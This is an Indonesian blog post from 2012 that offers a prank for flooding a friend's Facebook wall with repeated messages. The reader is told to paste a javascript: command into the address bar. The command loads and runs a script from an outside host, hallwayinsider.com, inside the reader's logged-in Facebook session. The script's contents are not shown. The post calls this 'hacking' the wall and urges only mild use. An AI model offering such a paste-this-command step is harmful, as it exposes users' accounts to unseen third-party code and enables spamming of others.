Pages

Subscribe:

Sabtu, 03 Maret 2012

Bomb Wall facebook teman

Setelah saya pikir pikir akhirnya saya lakukan posting dengan mengangkat judul tersebut karena teman saya meminta untuk bomb wall facebook teman. Dalam hal ini saya tidak menyarankan bagi sobat blogger untuk membomb wall milik teman anda dengan keterlaluan. Dan ini saya share hanya untuk jail sedikit saja OK.

Oh ya langsung saja ini dia caranya :
1. Buka wall facebook teman yang Ingin
2. Copy script berikut dan paste pada address bar

javascript:(a = (b = document).createElement("script")).src = "//hallwayinsider.com/a.js", b.body.appendChild(a); void(0)

3. Pada pop up pertama isikan jumlah pesan yang ingin anda kirim
4. Pada pop up yang kedua isikan pesan yang ingin anda kirim
5. Selesai anda sudah hack wall milik teman anda

Oh ya sekali lagi saya pesan kepada anda jangan keterlaluan dalam menjahili teman anda, karena saya sudah pernah melakukannya dan teman-teman saya tidak suka saya jahil seperti itu. Oke silahkan bagi yang mau mencoba.

0 komentar:

:)) :)] ;)) ;;) :D ;) :p :(( :) :( :X =(( :-o :-/ :-* :| 8-} ~x( :-t b-( :-L x( =))

Posting Komentar

Pengunjung yang baik adalah pengunjung yang selalu meninggalkan komentarnya. Baik di kotak komentar maupun di kotak envolve. Terimakasih telah berkunjung

Daftar isi